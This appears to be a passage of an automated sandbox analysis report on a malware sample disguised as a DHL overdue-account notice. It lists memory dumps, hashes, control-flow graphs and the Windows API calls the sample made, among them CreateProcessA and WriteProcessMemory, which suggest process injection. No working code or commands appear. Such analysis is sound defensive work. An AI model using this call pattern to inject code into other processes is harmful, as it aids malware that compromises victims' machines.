702b47d-702b4bd 182->192 206 702b549 183->206 184->185 185->186 186->106 187->173 188->187 189->206 190->206 191->206 192->206 210 702b623-702b6b6 201->210 202->210 206->169 214 702b6bd-702b6d5 210->214 214->98
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: &IH3
                                                  • API String ID: 0-1546010026
                                                  • Opcode ID: 9072ec282c29b832428f08cca20f214a1b9d7855ed4e1d2a1d6230e0b95afb21
                                                  • Instruction ID: 6311f42cf228ac0fcee737e7cf2c36df0fbec893382b153c696bc3cf0b20c823
                                                  • Opcode Fuzzy Hash: 9072ec282c29b832428f08cca20f214a1b9d7855ed4e1d2a1d6230e0b95afb21
                                                  • Instruction Fuzzy Hash: 3DB2C4B5A00628CFDB54CF69C984AD9BBB2FF89304F1581E9D509AB325DB319E81DF40
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: tIh
                                                  • API String ID: 0-443931868
                                                  • Opcode ID: e0d719d0a04e05b7e28ff7b1db305d444d7b12bdc44451d56bb14e86f382d1ad
                                                  • Instruction ID: 623f4998e855dc8990e539b3994346ceabcfd7d5cbb8541a912c29171d8bce71
                                                  • Opcode Fuzzy Hash: e0d719d0a04e05b7e28ff7b1db305d444d7b12bdc44451d56bb14e86f382d1ad
                                                  • Instruction Fuzzy Hash: 0CD127B0E1420ADFEB18CF95C4859AEFBF6FF89300F109559D415AB254D738AA82CF94
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: )"
                                                  • API String ID: 0-4237191880
                                                  • Opcode ID: 0eca520ec0a5423fda08c2bc63579cb60e00b9a6abe6d45a4cee880577cd4d87
                                                  • Instruction ID: 0b7f82188630f8749585dde0b60e95ef5e1b59490ab07e0c82db7455b5274bfa
                                                  • Opcode Fuzzy Hash: 0eca520ec0a5423fda08c2bc63579cb60e00b9a6abe6d45a4cee880577cd4d87
                                                  • Instruction Fuzzy Hash: 0381C3B4E002099FDB08CFAAC984AEEBBF2FF89310F14952AD419AB354D7355945CF54
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e1c376050e6a5fea27b929aadf050c8d56018007f117d9aa95e959c1deef8be
                                                  • Instruction ID: 787c5beba856769328ffdb2aae28bb1bcf6e0c2fe3907e1957e57df3c5db2b24
                                                  • Opcode Fuzzy Hash: 1e1c376050e6a5fea27b929aadf050c8d56018007f117d9aa95e959c1deef8be
                                                  • Instruction Fuzzy Hash: 0372A071B002168FDB48AB78C85476E7BE6AFC8350F248569E506DB3A6CF34DC06DB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 7be21634a3e474a7694692c7ab8957ef5526ba6bffd90f753a25aa6f51b9d708
                                                  • Instruction ID: 3bfb29531c10a44bac8521e7e9558d2b8c9ca3e1a704f5a4b8da353d1ee4f567
                                                  • Opcode Fuzzy Hash: 7be21634a3e474a7694692c7ab8957ef5526ba6bffd90f753a25aa6f51b9d708
                                                  • Instruction Fuzzy Hash: 86722D71A0021ACFCB54DF68C880AEDB7F1BF89310F1586AAD559AB351DB70AD85CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368283913.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_78f0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: eea0c1440c5d66ba07913f118dfdf55e5fb48ecb1dd8ce050685116d59378464
                                                  • Instruction ID: 639957d21f5acf575e8452d077688a48e59244870ea6d118c7b2d8b7aac42ce5
                                                  • Opcode Fuzzy Hash: eea0c1440c5d66ba07913f118dfdf55e5fb48ecb1dd8ce050685116d59378464
                                                  • Instruction Fuzzy Hash: D7521374600609CFDB14DF68C588AADBBF2BF88314F2585A8E50ADB761DB34ED42CB50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2357320245.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5040000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 6b4febffb72f5b85d3daee8f27dc177e250cfbb5e370f69dbb9955fad3fa4e12
                                                  • Instruction ID: 71aab1bbaa5bf960209e40049bb36d6a877bd5a6dfa20185222b611fdc24471e
                                                  • Opcode Fuzzy Hash: 6b4febffb72f5b85d3daee8f27dc177e250cfbb5e370f69dbb9955fad3fa4e12
                                                  • Instruction Fuzzy Hash: C0524E34A00306CFDB14DF28C844B99B7B2FF85314F2586A9D5596F3A2DBB5A982CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2357320245.0000000005040000.00000040.00000800.00020000.00000000.sdmp, Offset: 05040000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_5040000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 1e578c0fb623184749666fda23eb6a10eb2b2d0b76be94d8e81bc0756b877874
                                                  • Instruction ID: 30444231815b0393a6eb510f6a9c6051bfa9b5c56358110dde1e1f6c22d6f96e
                                                  • Opcode Fuzzy Hash: 1e578c0fb623184749666fda23eb6a10eb2b2d0b76be94d8e81bc0756b877874
                                                  • Instruction Fuzzy Hash: 73525F34A00346CFDB14DF28C844B99B7B2FF85314F2586A9D5586F3A2DBB5A982CF41
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2361186141.0000000007340000.00000040.00000800.00020000.00000000.sdmp, Offset: 07340000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7340000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97feb24d5ca409beae935dfb7e0f11b614ad602f1cf93655bbb09be4ca13c672
                                                  • Instruction ID: b18ad8042ebcb357addf8fa1f325a4a1401d5881825524879eff80429a743b26
                                                  • Opcode Fuzzy Hash: 97feb24d5ca409beae935dfb7e0f11b614ad602f1cf93655bbb09be4ca13c672
                                                  • Instruction Fuzzy Hash: 068114B5E1521ADFDB44CFA9C8809EEFBF1FB89200F10A55AD419B7214D338A901CFA4
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368283913.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_78f0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5715e8d3158e3041aed2f4a429b7163ae0e795406eb5cfac35c0e6b3fac0d088
                                                  • Instruction ID: c14dbc6c07d6089b49e62dc0a64764ba5d379b33c99053e65ffcf46f4cf30d3b
                                                  • Opcode Fuzzy Hash: 5715e8d3158e3041aed2f4a429b7163ae0e795406eb5cfac35c0e6b3fac0d088
                                                  • Instruction Fuzzy Hash: 605124717002428FCB259F74D45069E7BA2AF86320F2445AEE615CB3E1CB349D06CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: c8c1d61ffea590c6031938780f11585b046cae12fd599fef7681157bb11abac9
                                                  • Instruction ID: 375fe39ccf330c1789020f44070b8e31a46952e4a62db0b9cadc02bb6e80a1fe
                                                  • Opcode Fuzzy Hash: c8c1d61ffea590c6031938780f11585b046cae12fd599fef7681157bb11abac9
                                                  • Instruction Fuzzy Hash: D6211DB1E146598BDB18CFABC8042DEBBF7AFC9300F04C17AC418AB658DB7519469F51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2359248809.0000000007020000.00000040.00000800.00020000.00000000.sdmp, Offset: 07020000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_7020000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 732890fbf78928f01f2da98f03c81dee6623fca3828236e19dc202aca61869e1
                                                  • Instruction ID: a177b1111745e0aaa4a8d9c5151400665434f662b6632e276fee891ca22738fb
                                                  • Opcode Fuzzy Hash: 732890fbf78928f01f2da98f03c81dee6623fca3828236e19dc202aca61869e1
                                                  • Instruction Fuzzy Hash: 43111CB1E046188BEB1CCFABC90439EBAF7AFC9300F04C17A8418AA658DB7419469F50
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 010BDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 010BE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 010BE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 010BE0B1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 533d48983d6bd1628fb97f999d43a3ff6f39e64a6a1bc026c9093ff6373bfc98
                                                  • Instruction ID: d774ddd360ad812817e28fd1ad9cc13b3f9a2cbcb80f8c6410901630efdabbdb
                                                  • Opcode Fuzzy Hash: 533d48983d6bd1628fb97f999d43a3ff6f39e64a6a1bc026c9093ff6373bfc98
                                                  • Instruction Fuzzy Hash: E35165B090134ACFDB54CFA9D588BDEBBF0FF88314F208459E408AB260CB749984CB61
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  APIs
                                                  • GetCurrentProcess.KERNEL32 ref: 010BDFDE
                                                  • GetCurrentThread.KERNEL32 ref: 010BE01B
                                                  • GetCurrentProcess.KERNEL32 ref: 010BE058
                                                  • GetCurrentThreadId.KERNEL32 ref: 010BE0B1
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: Current$ProcessThread
                                                  • String ID:
                                                  • API String ID: 2063062207-0
                                                  • Opcode ID: 20aa8349038bf225a0a85362eb922c314ca1ad1c584a104073e34e3dfda9f744
                                                  • Instruction ID: 129d33ac22913ae74a915577eeb22cb6ff5cb8c53b715316b789a647dc0b305f
                                                  • Opcode Fuzzy Hash: 20aa8349038bf225a0a85362eb922c314ca1ad1c584a104073e34e3dfda9f744
                                                  • Instruction Fuzzy Hash: FF5165B090134ACFDB54CFAAD588BDEBBF1FF88314F208459E409A7250DB74A984CB65
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 215 73e612c-73e61cd 217 73e61cf-73e61d9 215->217 218 73e6206-73e6226 215->218 217->218 219 73e61db-73e61dd 217->219 223 73e625f-73e628e 218->223 224 73e6228-73e6232 218->224 221 73e61df-73e61e9 219->221 222 73e6200-73e6203 219->222 225 73e61ed-73e61fc 221->225 226 73e61eb 221->226 222->218 234 73e62c7-73e6381 CreateProcessA 223->234 235 73e6290-73e629a 223->235 224->223 227 73e6234-73e6236 224->227 225->225 228 73e61fe 225->228 226->225 229 73e6238-73e6242 227->229 230 73e6259-73e625c 227->230 228->222 232 73e6246-73e6255 229->232 233 73e6244 229->233 230->223 232->232 236 73e6257 232->236 233->232 246 73e638a-73e6410 234->246 247 73e6383-73e6389 234->247 235->234 237 73e629c-73e629e 235->237 236->230 239 73e62a0-73e62aa 237->239 240 73e62c1-73e62c4 237->240 241 73e62ae-73e62bd 239->241 242 73e62ac 239->242 240->234 241->241 243 73e62bf 241->243 242->241 243->240 257 73e6412-73e6416 246->257 258 73e6420-73e6424 246->258 247->246 257->258 259 73e6418 257->259 260 73e6426-73e642a 258->260 261 73e6434-73e6438 258->261 259->258 260->261 262 73e642c 260->262 263 73e643a-73e643e 261->263 264 73e6448-73e644c 261->264 262->261 263->264 267 73e6440 263->267 265 73e645e-73e6465 264->265 266 73e644e-73e6454 264->266 268 73e647c 265->268 269 73e6467-73e6476 265->269 266->265 267->264 271 73e647d 268->271 269->268 271->271
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073E636E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: bd935cbfa5341e09139a92ea0694b3ea285b461e71d3c6d21e98bb125dbf9ce2
                                                  • Instruction ID: e72cacb49903485596219c8e322baf7ce8b5f4ccc223c4277a7d68998d31cc9d
                                                  • Opcode Fuzzy Hash: bd935cbfa5341e09139a92ea0694b3ea285b461e71d3c6d21e98bb125dbf9ce2
                                                  • Instruction Fuzzy Hash: D2A160B1D0026ACFEF15CF68C8417DDBBB6BF48314F148169E848A7290D7759985CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 272 73e6138-73e61cd 274 73e61cf-73e61d9 272->274 275 73e6206-73e6226 272->275 274->275 276 73e61db-73e61dd 274->276 280 73e625f-73e628e 275->280 281 73e6228-73e6232 275->281 278 73e61df-73e61e9 276->278 279 73e6200-73e6203 276->279 282 73e61ed-73e61fc 278->282 283 73e61eb 278->283 279->275 291 73e62c7-73e6381 CreateProcessA 280->291 292 73e6290-73e629a 280->292 281->280 284 73e6234-73e6236 281->284 282->282 285 73e61fe 282->285 283->282 286 73e6238-73e6242 284->286 287 73e6259-73e625c 284->287 285->279 289 73e6246-73e6255 286->289 290 73e6244 286->290 287->280 289->289 293 73e6257 289->293 290->289 303 73e638a-73e6410 291->303 304 73e6383-73e6389 291->304 292->291 294 73e629c-73e629e 292->294 293->287 296 73e62a0-73e62aa 294->296 297 73e62c1-73e62c4 294->297 298 73e62ae-73e62bd 296->298 299 73e62ac 296->299 297->291 298->298 300 73e62bf 298->300 299->298 300->297 314 73e6412-73e6416 303->314 315 73e6420-73e6424 303->315 304->303 314->315 316 73e6418 314->316 317 73e6426-73e642a 315->317 318 73e6434-73e6438 315->318 316->315 317->318 319 73e642c 317->319 320 73e643a-73e643e 318->320 321 73e6448-73e644c 318->321 319->318 320->321 324 73e6440 320->324 322 73e645e-73e6465 321->322 323 73e644e-73e6454 321->323 325 73e647c 322->325 326 73e6467-73e6476 322->326 323->322 324->321 328 73e647d 325->328 326->325 328->328
                                                  APIs
                                                  • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 073E636E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: CreateProcess
                                                  • String ID:
                                                  • API String ID: 963392458-0
                                                  • Opcode ID: 5f2558fc92cb56f5e228a14b54bafbeda27a856a0f3f04a7bbd04a05232bc5d0
                                                  • Instruction ID: 0395fca2b0e8d028e7e8bb3e525f7b75244af3febf6bb82f733a049d01941f21
                                                  • Opcode Fuzzy Hash: 5f2558fc92cb56f5e228a14b54bafbeda27a856a0f3f04a7bbd04a05232bc5d0
                                                  • Instruction Fuzzy Hash: 9C916EB1D0022ACFEF14CF68C941BDDBBB6BF48314F148169E818A7280DB759985CF92
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 329 10bbcb8-10bbcd7 330 10bbcd9-10bbce6 call 10b921c 329->330 331 10bbd03-10bbd07 329->331 337 10bbce8 330->337 338 10bbcfc 330->338 333 10bbd1b-10bbd5c 331->333 334 10bbd09-10bbd13 331->334 340 10bbd69-10bbd77 333->340 341 10bbd5e-10bbd66 333->341 334->333 386 10bbcee call 10bbf50 337->386 387 10bbcee call 10bbf60 337->387 338->331 342 10bbd9b-10bbd9d 340->342 343 10bbd79-10bbd7e 340->343 341->340 348 10bbda0-10bbda7 342->348 345 10bbd89 343->345 346 10bbd80-10bbd87 call 10bb66c 343->346 344 10bbcf4-10bbcf6 344->338 347 10bbe38-10bbef8 344->347 350 10bbd8b-10bbd99 345->350 346->350 379 10bbefa-10bbefd 347->379 380 10bbf00-10bbf2b GetModuleHandleW 347->380 351 10bbda9-10bbdb1 348->351 352 10bbdb4-10bbdbb 348->352 350->348 351->352 353 10bbdc8-10bbdd1 call 10bb67c 352->353 354 10bbdbd-10bbdc5 352->354 360 10bbdde-10bbde3 353->360 361 10bbdd3-10bbddb 353->361 354->353 362 10bbe01-10bbe05 360->362 363 10bbde5-10bbdec 360->363 361->360 384 10bbe08 call 10bc250 362->384 385 10bbe08 call 10bc260 362->385 363->362 365 10bbdee-10bbdfe call 10bb68c call 10bb69c 363->365 365->362 368 10bbe0b-10bbe0e 370 10bbe31-10bbe37 368->370 371 10bbe10-10bbe2e 368->371 371->370 379->380 381 10bbf2d-10bbf33 380->381 382 10bbf34-10bbf48 380->382 381->382 384->368 385->368 386->344 387->344
                                                  APIs
                                                  • GetModuleHandleW.KERNELBASE(00000000), ref: 010BBF1E
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: HandleModule
                                                  • String ID:
                                                  • API String ID: 4139908857-0
                                                  • Opcode ID: 4afc8ffe1d2061b0d48784377a1480f55c811f4f24e9d3bfeb587cb46ff42921
                                                  • Instruction ID: a28c470fbcf466dacb8b2650007e86801dc3a97bfc1cd917f678efc4ede42e56
                                                  • Opcode Fuzzy Hash: 4afc8ffe1d2061b0d48784377a1480f55c811f4f24e9d3bfeb587cb46ff42921
                                                  • Instruction Fuzzy Hash: 1A816770A00B058FD764DF29D48079ABBF1FF88304F00896ED58ADBA51EB79E805CB91
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 388 73eb8ff-73eb917 390 73eb93b-73eb942 388->390 391 73eb919 388->391 392 73eb959-73eb967 call 73e97a8 390->392 393 73eb944-73eb953 390->393 394 73eb91c-73eb922 391->394 402 73eb969-73eb96b 392->402 403 73eb971-73eb99a call 73e7728 call 73e97b8 392->403 393->392 396 73eb928-73eb92e 394->396 397 73ebb00-73ebb36 394->397 400 73eb938-73eb939 396->400 401 73eb930-73eb932 396->401 405 73ebb3d-73ebb62 KiUserExceptionDispatcher 397->405 406 73ebb38 397->406 400->390 400->394 401->400 402->403 413 73eb99c-73eb9aa 403->413 414 73eb9c7-73eb9e3 403->414 408 73ebb64-73ebb6d 405->408 406->405 413->414 417 73eb9ac-73eb9c0 413->417 418 73eb9f6-73eba1d call 73e97c8 414->418 419 73eb9e5-73eb9ef 414->419 417->414 424 73eba1f-73eba25 418->424 425 73eba35-73eba39 418->425 419->418 426 73eba29-73eba2b 424->426 427 73eba27 424->427 428 73eba3b-73eba4d 425->428 429 73eba54-73eba70 425->429 426->425 427->425 428->429 432 73eba88-73eba8c 429->432 433 73eba72-73eba78 429->433 436 73eba8e-73eba9c 432->436 437 73ebaf8-73ebaff 432->437 434 73eba7c-73eba7e 433->434 435 73eba7a 433->435 434->432 435->432 439 73ebaae-73ebab2 436->439 440 73eba9e-73ebaac 436->440 442 73ebab8-73ebad0 439->442 440->439 440->442
                                                  APIs
                                                  • KiUserExceptionDispatcher.NTDLL ref: 073EBB47
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: DispatcherExceptionUser
                                                  • String ID:
                                                  • API String ID: 6842923-0
                                                  • Opcode ID: 5dfb598f4912302fe627df9e0890dff866eb33e9d47b65bf08e4c968333036fc
                                                  • Instruction ID: cc1881099f28350e25b2796867365fc30a4b69f2d8b60a79ae40f1d5bb59bfdc
                                                  • Opcode Fuzzy Hash: 5dfb598f4912302fe627df9e0890dff866eb33e9d47b65bf08e4c968333036fc
                                                  • Instruction Fuzzy Hash: 04719FF1701616DFEB16DB79C450BAEBBFAAF89300F1445AAD1599B3A0DB30E801CB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 444 10b5d0c-10b5dd9 CreateActCtxA 446 10b5ddb-10b5de1 444->446 447 10b5de2-10b5e3c 444->447 446->447 454 10b5e4b-10b5e4f 447->454 455 10b5e3e-10b5e41 447->455 456 10b5e51-10b5e5d 454->456 457 10b5e60 454->457 455->454 456->457 459 10b5e61 457->459 459->459
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 010B5DC9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: c5f0e2557580de00fe469c13af3da422803554b39fbedecd10ee0ead07e3661a
                                                  • Instruction ID: e95595520b44855b75160ad8695572be7b68dde383e1dd0a30fd7d0152d22417
                                                  • Opcode Fuzzy Hash: c5f0e2557580de00fe469c13af3da422803554b39fbedecd10ee0ead07e3661a
                                                  • Instruction Fuzzy Hash: 5D410370C00719CBEB25CFA9C8847CEBBF1BF48704F2081AAD448AB251DB716945CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 460 10b4538-10b5dd9 CreateActCtxA 463 10b5ddb-10b5de1 460->463 464 10b5de2-10b5e3c 460->464 463->464 471 10b5e4b-10b5e4f 464->471 472 10b5e3e-10b5e41 464->472 473 10b5e51-10b5e5d 471->473 474 10b5e60 471->474 472->471 473->474 476 10b5e61 474->476 476->476
                                                  APIs
                                                  • CreateActCtxA.KERNEL32(?), ref: 010B5DC9
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2352768501.00000000010B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 010B0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_10b0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: Create
                                                  • String ID:
                                                  • API String ID: 2289755597-0
                                                  • Opcode ID: 6a87816ab0872b92b44ad2a2f14616e607c3aad5135e7227929e455a9d98cd9b
                                                  • Instruction ID: 692efb904f36e9552dd07f21304a8aa266352361fbdb7c3d4a4b739c12e00c46
                                                  • Opcode Fuzzy Hash: 6a87816ab0872b92b44ad2a2f14616e607c3aad5135e7227929e455a9d98cd9b
                                                  • Instruction Fuzzy Hash: D841C070C00719CBEB24DFA9C98479EBBB5BF48704F2081AAD508AB255DB756945CF90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 477 73e5aa8-73e5afe 480 73e5b0e-73e5b4d WriteProcessMemory 477->480 481 73e5b00-73e5b0c 477->481 483 73e5b4f-73e5b55 480->483 484 73e5b56-73e5b86 480->484 481->480 483->484
                                                  APIs
                                                  • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 073E5B40
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368117805.00000000073E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 073E0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_73e0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: MemoryProcessWrite
                                                  • String ID:
                                                  • API String ID: 3559483778-0
                                                  • Opcode ID: a4f6a95e29d7009956a8d167464162841b42068782a19387405cbc38b6b7693c
                                                  • Instruction ID: 06946635f23d69497742eb38203769a43391ae549730a8f18c5f21db162306c1
                                                  • Opcode Fuzzy Hash: a4f6a95e29d7009956a8d167464162841b42068782a19387405cbc38b6b7693c
                                                  • Instruction Fuzzy Hash: F22137B590035A9FDB10CFA9C881BDEBBF5FF88314F148429E958A7240C7789954CBA5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 498 78f9ed8-78f9f2c 499 78f9f2e-78f9f34 498->499 500 78f9f37-78f9f46 498->500 499->500 501 78f9f4b-78f9f84 DrawTextExW 500->501 502 78f9f48 500->502 503 78f9f8d-78f9faa 501->503 504 78f9f86-78f9f8c 501->504 502->501 504->503
                                                  APIs
                                                  • DrawTextExW.USER32(?,?,?,?,?,?), ref: 078F9F77
                                                  Memory Dump Source
                                                  • Source File: 00000001.00000002.2368283913.00000000078F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078F0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_1_2_78f0000_DHL - OVERDUE ACCOUNT NOTICE - 1301669350.jbxd
                                                  Similarity
                                                  • API ID: DrawText
                                                  • String ID:
                                                  • API String ID: 2175133113-0
